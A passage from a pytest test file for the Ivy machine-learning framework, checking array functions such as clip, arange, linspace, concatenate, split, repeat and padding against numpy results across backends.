ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# get_num_dims
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_get_num_dims(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.get_num_dims(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# minimum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_minimum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.minimum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.minimum, x, y), np.asarray(ivy.functional.backends.numpy.minimum(ivy.to_numpy(x), ivy.to_numpy(y))))
# maximum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_maximum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.maximum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.maximum, x, y), np.asarray(ivy.functional.backends.numpy.maximum(ivy.to_numpy(x), ivy.to_numpy(y))))
# clip
@pytest.mark.parametrize(
"x_min_n_max", [(-0.5, 0., 1.5), ([1.7], [0.5], [1.1]), ([[0.8, 2.2], [1.5, 0.2]], 0.2, 1.4),
([[0.8, 2.2], [1.5, 0.2]], [[1., 1.], [1., 1.]], [[1.1, 2.], [1.1, 2.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip(x_min_n_max, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_min_n_max[0], Number) or isinstance(x_min_n_max[1], Number) or isinstance(x_min_n_max[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_min_n_max[0], dtype, dev)
min_val = tensor_fn(x_min_n_max[1], dtype, dev)
max_val = tensor_fn(x_min_n_max[2], dtype, dev)
if ((min_val.shape != [] and min_val.shape != [1]) or (max_val.shape != [] and max_val.shape != [1]))\
and call in [helpers.mx_call]:
# mxnet only supports numbers or 0 or 1 dimensional arrays for min and max while performing clip
pytest.skip()
ret = ivy.clip(x, min_val, max_val)
# type test
assert ivy.is_array(ret)
# cardinality test
max_shape = max([x.shape, min_val.shape, max_val.shape], key=lambda x_: len(x_))
assert ret.shape == max_shape
# value test
assert np.array_equal(call(ivy.clip, x, min_val, max_val),
np.asarray(ivy.functional.backends.numpy.clip(ivy.to_numpy(x), ivy.to_numpy(min_val), ivy.to_numpy(max_val))))
# clip_vector_norm
# @pytest.mark.parametrize(
# "x_max_norm_n_p_val_clipped",
# [(-0.5, 0.4, 2., -0.4), ([1.7], 1.5, 3., [1.5]),
# ([[0.8, 2.2], [1.5, 0.2]], 4., 1., [[0.6808511, 1.8723406], [1.2765958, 0.17021278]]),
# ([[0.8, 2.2], [1.5, 0.2]], 2.5, 2., [[0.71749604, 1.9731141], [1.345305, 0.17937401]])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_clip_vector_norm(x_max_norm_n_p_val_clipped, dtype, tensor_fn, dev, call):
# # smoke test
# if call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype, dev)
# max_norm = x_max_norm_n_p_val_clipped[1]
# p_val = x_max_norm_n_p_val_clipped[2]
# clipped = x_max_norm_n_p_val_clipped[3]
# ret = ivy.clip_vector_norm(x, max_norm, p_val)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == (x.shape if len(x.shape) else (1,))
# # value test
# assert np.allclose(call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped))
# # compilation test
# if call is helpers.torch_call:
# # pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
# return
# round
@pytest.mark.parametrize(
"x_n_x_rounded", [(-0.51, -1), ([1.7], [2.]), ([[0.8, 2.2], [1.51, 0.2]], [[1., 2.], [2., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_round(x_n_x_rounded, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_rounded[0], Number) or isinstance(x_n_x_rounded[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_rounded[0], dtype, dev)
ret = ivy.round(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.array_equal(call(ivy.round, x), np.array(x_n_x_rounded[1]))
# floormod
@pytest.mark.parametrize(
"x_n_divisor_n_x_floormod", [(2.5, 2., 0.5), ([10.7], [5.], [0.7]),
([[0.8, 2.2], [1.7, 0.2]], [[0.3, 0.5], [0.4, 0.11]], [[0.2, 0.2], [0.1, 0.09]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floormod(x_n_divisor_n_x_floormod, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_divisor_n_x_floormod[0], Number) or isinstance(x_n_divisor_n_x_floormod[1], Number) or
isinstance(x_n_divisor_n_x_floormod[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_divisor_n_x_floormod[0], dtype, dev)
divisor = ivy.array(x_n_divisor_n_x_floormod[1], dtype, dev)
ret = ivy.floormod(x, divisor)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floormod, x, divisor), np.array(x_n_divisor_n_x_floormod[2]))
# floor
@pytest.mark.parametrize(
"x_n_x_floored", [(2.5, 2.), ([10.7], [10.]), ([[3.8, 2.2], [1.7, 0.2]], [[3., 2.], [1., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floor(x_n_x_floored, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_floored[0], Number) or isinstance(x_n_x_floored[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_floored[0], dtype, dev)
ret = ivy.floor(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floor, x), np.array(x_n_x_floored[1]))
# ceil
@pytest.mark.parametrize(
"x_n_x_ceiled", [(2.5, 3.), ([10.7], [11.]), ([[3.8, 2.2], [1.7, 0.2]], [[4., 3.], [2., 1.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ceil(x_n_x_ceiled, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_ceiled[0], Number) or isinstance(x_n_x_ceiled[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_ceiled[0], dtype, dev)
ret = ivy.ceil(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ceil, x), np.array(x_n_x_ceiled[1]))
# abs
@pytest.mark.parametrize(
"x_n_x_absed", [(-2.5, 2.5), ([-10.7], [10.7]), ([[-3.8, 2.2], [1.7, -0.2]], [[3.8, 2.2], [1.7, 0.2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_abs(x_n_x_absed, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_absed[0], Number) or isinstance(x_n_x_absed[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_absed[0], dtype, dev)
ret = ivy.abs(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.abs, x), np.array(x_n_x_absed[1]))
# argmax
# @pytest.mark.parametrize(
# "x_n_axis_x_argmax", [([-0.3, 0.1], None, [1]), ([[1.3, 2.6], [2.3, 2.5]], 0, [1, 0]),
# ([[1.3, 2.6], [2.3, 2.5]], 1, [1, 1])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argmax(x_n_axis_x_argmax, dtype, tensor_fn, dev, call):
# # smoke test
# x = ivy.array(x_n_axis_x_argmax[0], dtype, dev)
# axis = x_n_axis_x_argmax[1]
# ret = ivy.argmax(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (len(x.shape),)
# # value test
# assert np.allclose(call(ivy.argmax, x, axis), np.array(x_n_axis_x_argmax[2]))
# argmin
@pytest.mark.parametrize(
"x_n_axis_x_argmin", [([-0.3, 0.1], None, [0]), ([[1.3, 2.6], [2.3, 2.5]], 0, [0, 1]),
([[1.3, 2.6], [2.3, 2.5]], 1, [0, 0])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmin(x_n_axis_x_argmin, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argmin[0], dtype, dev)
axis = x_n_axis_x_argmin[1]
ret = ivy.argmin(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmin, x, axis), np.array(x_n_axis_x_argmin[2]))
# argsort
# @pytest.mark.parametrize(
# "x_n_axis_x_argsort", [([1, 10, 26.9, 2.8, 166.32, 62.3], -1, [0, 3, 1, 2, 5, 4])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argsort(x_n_axis_x_argsort, dtype, tensor_fn, dev, call):
# # smoke test
# x = tensor_fn(x_n_axis_x_argsort[0], dtype, dev)
# axis = x_n_axis_x_argsort[1]
# ret = ivy.argsort(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (6,)
# # value test
# assert np.allclose(call(ivy.argsort, x, axis), np.array(x_n_axis_x_argsort[2]))
# arange
@pytest.mark.parametrize(
"stop_n_start_n_step", [[10, None, None], [10, 2, None], [10, 2, 2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_arange(stop_n_start_n_step, dtype, tensor_fn, dev, call):
# smoke test
stop, start, step = stop_n_start_n_step
if (isinstance(stop, Number) or isinstance(start, Number) or isinstance(step, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if tensor_fn == helpers.var_fn and call is helpers.torch_call:
# pytorch does not support arange using variables as input
pytest.skip()
args = list()
if stop:
stop = tensor_fn(stop, dtype, dev)
args.append(stop)
if start:
start = tensor_fn(start, dtype, dev)
args.append(start)
if step:
step = tensor_fn(step, dtype, dev)
args.append(step)
ret = ivy.arange(*args, dtype=dtype, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (int((ivy.to_list(stop) -
(ivy.to_list(start) if start else 0))/(ivy.to_list(step) if step else 1)),)
# value test
assert np.array_equal(call(ivy.arange, *args, dtype=dtype, dev=dev),
np.asarray(ivy.functional.backends.numpy.arange(*[ivy.to_numpy(arg) for arg in args], dtype=dtype)))
# linspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_axis", [[1, 10, 100, None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linspace(start_n_stop_n_num_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, axis = start_n_stop_n_num_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.linspace(start, stop, num, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.linspace, start, stop, num, axis, dev=dev),
np.asarray(ivy.functional.backends.numpy.linspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, axis)))
# logspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_base_n_axis", [[1, 10, 100, 10., None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, 2., -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, 5., -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_logspace(start_n_stop_n_num_n_base_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, base, axis = start_n_stop_n_num_n_base_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.logspace(start, stop, num, base, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.logspace, start, stop, num, base, axis, dev=dev),
ivy.functional.backends.numpy.logspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, base, axis))
# concatenate
@pytest.mark.parametrize(
"x1_n_x2_n_axis", [(1, 10, 0), ([[0., 1., 2.]], [[1., 2., 3.]], 0), ([[0., 1., 2.]], [[1., 2., 3.]], 1),
([[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_concatenate(x1_n_x2_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x1, x2, axis = x1_n_x2_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.concatenate((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = tuple([item * 2 if i == axis_val else item for i, item in enumerate(x1.shape)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.concatenate, [x1, x2], axis),
np.asarray(ivy.functional.backends.numpy.concatenate([ivy.to_numpy(x1), ivy.to_numpy(x2)], axis)))
# flip
# @pytest.mark.parametrize(
# "x_n_axis_n_bs", [(1, 0, None), ([[0., 1., 2.]], None, (1, 3)), ([[0., 1., 2.]], 1, (1, 3)),
# ([[[-0.1471, 0.4477, 0.2214]]], None, None)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_flip(x_n_axis_n_bs, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis, bs = x_n_axis_n_bs
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.flip(x, axis, bs)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.flip, x, axis, bs), np.asarray(ivy.functional.backends.numpy.flip(ivy.to_numpy(x), axis, bs)))
# stack
# @pytest.mark.parametrize(
# "xs_n_axis", [((1, 0), -1), (([[0., 1., 2.]], [[3., 4., 5.]]), 0), (([[0., 1., 2.]], [[3., 4., 5.]]), 1)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_stack(xs_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# (x1, x2), axis = xs_n_axis
# if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x1 = tensor_fn(x1, dtype, dev)
# x2 = tensor_fn(x2, dtype, dev)
# ret = ivy.stack((x1, x2), axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
# if x1.shape == ():
# expected_shape = (2,)
# else:
# expected_shape = list(x1.shape)
# expected_shape.insert(axis_val, 2)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.stack, (x1, x2), axis),
# np.asarray(ivy.functional.backends.numpy.stack((ivy.to_numpy(x1), ivy.to_numpy(x2)), axis)))
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0., 1., 2.]], 0), ([[0., 1., 2.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.unstack, x, axis), np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)))
# split
@pytest.mark.parametrize(
"x_n_noss_n_axis_n_wr", [(1, 1, -1, False),
([[0., 1., 2., 3.]], 2, 1, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 0, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 1, True),
([[0., 1., 2.], [3., 4., 5.]], [2, 1], 1, False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_split(x_n_noss_n_axis_n_wr, dtype, tensor_fn, dev, call):
# smoke test
x, num_or_size_splits, axis, with_remainder = x_n_noss_n_axis_n_wr
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.split(x, num_or_size_splits, axis, with_remainder)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
elif isinstance(num_or_size_splits, int):
expected_shape = tuple([math.ceil(item/num_or_size_splits) if i == axis_val else item
for i, item in enumerate(x.shape)])
else:
expected_shape = tuple([num_or_size_splits[0] if i == axis_val else item for i, item in enumerate(x.shape)])
assert ret[0].shape == expected_shape
# value test
pred_split = call(ivy.split, x, num_or_size_splits, axis, with_remainder)
true_split = ivy.functional.backends.numpy.split(ivy.to_numpy(x), num_or_size_splits, axis, with_remainder)
for pred, true in zip(pred_split, true_split):
assert np.allclose(pred, true)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
# repeat
@pytest.mark.parametrize(
"x_n_reps_n_axis", [(1, [1], 0), (1, 2, -1), (1, [2], None), ([[0., 1., 2., 3.]], (2, 1, 0, 3), -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_repeat(x_n_reps_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw, axis = x_n_reps_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if not isinstance(reps_raw, int) and call is helpers.mx_call:
# mxnet repeat only supports integer repeats
pytest.skip()
x = tensor_fn(x, dtype, dev)
x_shape = list(x.shape)
if call not in [helpers.jnp_call, helpers.torch_call]:
# jax and pytorch repeat do not support repeats specified as lists
ret_from_list = ivy.repeat(x, reps_raw, axis)
reps = ivy.array(reps_raw, 'int32', dev)
if call is helpers.mx_call:
# mxnet only supports repeats defined as as int
ret = ivy.repeat(x, reps_raw, axis)
else:
ret = ivy.repeat(x, reps, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = [reps_raw] if isinstance(reps_raw, int) else list(reps_raw)
else:
axis_wrapped = axis % len(x_shape)
expected_shape = x_shape[0:axis_wrapped] + [sum(reps_raw)] + x_shape[axis_wrapped+1:]
assert list(ret.shape) == expected_shape
# value test
if call is helpers.mx_call:
# mxnet only supports repeats defined as as int
assert np.allclose(call(ivy.repeat, x, reps_raw, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
else:
assert np.allclose(call(ivy.repeat, x, reps, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
# tile
# @pytest.mark.parametrize(
# "x_n_reps", [(1, [1]), (1, 2), (1, [2]), ([[0., 1., 2., 3.]], (2, 1))])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_tile(x_n_reps, dtype, tensor_fn, dev, call):
# # smoke test
# x, reps_raw = x_n_reps
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret_from_list = ivy.tile(x, reps_raw)
# reps = ivy.array(reps_raw, 'int32', dev)
# ret = ivy.tile(x, reps)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if x.shape == ():
# expected_shape = tuple(reps_raw) if isinstance(reps_raw, list) else (reps_raw,)
# else:
# expected_shape = tuple([int(item * rep) for item, rep in zip(x.shape, reps_raw)])
# assert ret.shape == expected_shape
# # value test
# assert np.allclose(call(ivy.tile, x, reps),
# np.asarray(ivy.functional.backends.numpy.tile(ivy.to_numpy(x), ivy.to_numpy(reps))))
# zero_pad
@pytest.mark.parametrize(
"x_n_pw", [(1, [[1, 1]]), (1, [[0, 0]]), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zero_pad(x_n_pw, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw = x_n_pw
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.zero_pad(x, pw_raw)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.zero_pad(x, pw)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.zero_pad, x, pw), ivy.functional.backends.numpy.zero_pad(ivy.to_numpy(x), ivy.to_numpy(pw)))
# fourier_encode
# @pytest.mark.parametrize(
# "x_n_mf_n_nb_n_gt", [([2.], 4., 4, [[2.0000000e+00, 1.7484555e-07, 9.9805772e-01,-5.2196848e-01,
# 3.4969111e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01, 1.0000000e+00]]),
# ([[1., 2.], [3., 4.], [5., 6.]], [2., 4.], 4,
# [[[1.0000000e+00, -8.7422777e-08, -8.7422777e-08, -8.7422777e-08,
# -8.7422777e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [2.0000000e+00, 1.7484555e-07, 9.9805772e-01, -5.2196848e-01,
# -6.0398321e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01,
# 1.0000000e+00]],
# [[3.0000000e+00, -2.3849761e-08, -2.3849761e-08, -2.3849761e-08,
# -2.3849761e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [4.0000000e+00, 3.4969111e-07, -1.2434989e-01, 8.9044148e-01,
# -1.2079664e-06, 1.0000000e+00, -9.9223840e-01, 4.5509776e-01,
# 1.0000000e+00]],
# [[5.0000000e+00, -6.7553248e-07, -6.7553248e-07, -6.7553248e-07,
# -6.7553248e-07, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [6.0000000e+00, 4.7699523e-08, -9.8256493e-01, -9.9706185e-01,
# -3.7192983e-06, 1.0000000e+00, 1.8591987e-01, 7.6601014e-02,
# 1.0000000e+00]]])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, dev, call):
# # smoke test
# x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# if isinstance(max_freq, list):
# max_freq = tensor_fn(max_freq, dtype, dev)
# ret = ivy.fourier_encode(x, max_freq, num_bands)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# x_shape = [1] if x.shape == () else list(x.shape)
# expected_shape = x_shape + [1 + 2*num_bands]
# assert list(ret.shape) == expected_shape
# # value test
# assert np.allclose(call(ivy.fourier_encode, x, max_freq, num_bands), np.array(ground_truth), atol=1e-5)
# constant_pad
@pytest.mark.parametrize(
"x_n_pw_n_val", [(1, [[1, 1]], 1.5), (1, [[0, 0]], -2.7), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]], 11.)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_constant_pad(x_n_pw_n_val, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw, val = x_n_pw_n_val
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.constant_pad(x, pw_raw, val)
